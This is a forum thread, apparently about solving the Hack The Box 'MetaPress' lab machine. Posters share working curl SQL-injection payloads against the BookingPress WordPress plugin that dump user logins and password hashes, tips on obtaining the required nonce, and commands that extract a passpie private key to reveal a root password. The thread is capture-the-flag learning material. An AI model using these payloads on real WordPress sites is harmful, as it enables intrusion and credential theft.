Posts: 13 Threads: 0 Joined: N/A October 30, 2022 at 4:34 AM (October 30, 2022, 04:29 AM)iloveyouwtf Wrote: (October 30, 2022, 04:18 AM)SirKonafa Wrote: (October 29, 2022, 08:01 PM)elliotal53 Wrote: (October 29, 2022, 07:58 PM)vexxxi Wrote: (October 29, 2022, 07:55 PM)elliotal53 Wrote: {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
you have to use the proper nonce value
how to get nonce value ?
Look at the request body when you submit a booking, you will find a wp_nonce attribute which might work for you.
(October 30, 2022, 04:16 AM)iloveyouwtf Wrote: (October 29, 2022, 07:50 PM)11231123 Wrote: (October 29, 2022, 07:40 PM)elliotal53 Wrote: how did you get it to work? mind explaining a bit more ?
Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Do you think you can help me with the sqli?
1. Get a valid nonce for you, read my previous reply.
2. use the curl command you found
3. reconstruct the query to get what you want
If you wanna get info about the tables you can do:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=[YOUR NONCE]&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),0,1,2,3,4,5,6,7 from information_schema.tables-- -' | grep user
Now figure out how you wanna get the usernames and passwords, use this reference to know what variables you're looking for in which tables? https://wordpress.org/support/article/resetting-your-password/
Check out the "Through MySQL command line", you will get a hint on what columns you hunting
I have problems using conditionals like where, can I send you pm? Sure. Posts: 13 Threads: 0 Joined: N/A October 30, 2022 at 4:39 AM (October 30, 2022, 04:34 AM)SirKonafa Wrote: (October 30, 2022, 04:29 AM)iloveyouwtf Wrote: (October 30, 2022, 04:18 AM)SirKonafa Wrote: (October 29, 2022, 08:01 PM)elliotal53 Wrote: (October 29, 2022, 07:58 PM)vexxxi Wrote: you have to use the proper nonce value
how to get nonce value ?
Look at the request body when you submit a booking, you will find a wp_nonce attribute which might work for you.
(October 30, 2022, 04:16 AM)iloveyouwtf Wrote: (October 29, 2022, 07:50 PM)11231123 Wrote: Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Do you think you can help me with the sqli?
1. Get a valid nonce for you, read my previous reply.
2. use the curl command you found
3. reconstruct the query to get what you want
If you wanna get info about the tables you can do:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=[YOUR NONCE]&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),0,1,2,3,4,5,6,7 from information_schema.tables-- -' | grep user
Now figure out how you wanna get the usernames and passwords, use this reference to know what variables you're looking for in which tables? https://wordpress.org/support/article/resetting-your-password/
Check out the "Through MySQL command line", you will get a hint on what columns you hunting
I have problems using conditionals like where, can I send you pm?
Sure. you have them disabled ?Posts: 13 Threads: 0 Joined: N/A October 30, 2022 at 4:43 AM (October 30, 2022, 04:39 AM)iloveyouwtf Wrote: (October 30, 2022, 04:34 AM)SirKonafa Wrote: (October 30, 2022, 04:29 AM)iloveyouwtf Wrote: (October 30, 2022, 04:18 AM)SirKonafa Wrote: (October 29, 2022, 08:01 PM)elliotal53 Wrote: how to get nonce value ?
Look at the request body when you submit a booking, you will find a wp_nonce attribute which might work for you.
(October 30, 2022, 04:16 AM)iloveyouwtf Wrote: Do you think you can help me with the sqli?
1. Get a valid nonce for you, read my previous reply.
2. use the curl command you found
3. reconstruct the query to get what you want
If you wanna get info about the tables you can do:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=[YOUR NONCE]&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),0,1,2,3,4,5,6,7 from information_schema.tables-- -' | grep user
Now figure out how you wanna get the usernames and passwords, use this reference to know what variables you're looking for in which tables? https://wordpress.org/support/article/resetting-your-password/
Check out the "Through MySQL command line", you will get a hint on what columns you hunting
I have problems using conditionals like where, can I send you pm?
Sure.
you have them disabled ? yeah my bad Posts: 24 Threads: 0 Joined: N/A October 30, 2022 at 4:44 AM Posts: 5 Threads: 0 Joined: N/A October 30, 2022 at 5:11 AM (October 29, 2022, 09:08 PM)loge23 Wrote: (October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----
hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
/2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
lpF0RatbxQGWBks5F3o=
=uh1B
-----END PGP ME
declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`
passpie copy ssh --to stdout
Cool and well done! Posts: 27 Threads: 0 Joined: N/A October 30, 2022 at 7:30 AM (October 29, 2022, 09:08 PM)loge23 Wrote: (October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----
hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
/2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
lpF0RatbxQGWBks5F3o=
=uh1B
-----END PGP ME
declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`
passpie copy ssh --to stdout
thanks Posts: 49 Threads: 0 Joined: N/A October 30, 2022 at 7:34 AM (October 29, 2022, 09:08 PM)chamo20 Wrote: (October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----
hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
/2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
lpF0RatbxQGWBks5F3o=
=uh1B
-----END PGP ME
this has to do with https://github.com/marcwebbie/passpie Thank you Posts: 45 Threads: 0 Joined: N/A October 30, 2022 at 8:26 AM thanks bro Posts: 20 Threads: 0 Joined: N/A October 30, 2022 at 8:33 AM it's not true !!! Posts: 1 Threads: 0 Joined: N/A October 30, 2022 at 9:24 AM (October 29, 2022, 09:08 PM)loge23 Wrote: (October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----
hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
/2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
lpF0RatbxQGWBks5F3o=
=uh1B
-----END PGP ME
declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`
passpie copy ssh --to stdout
Thanks |
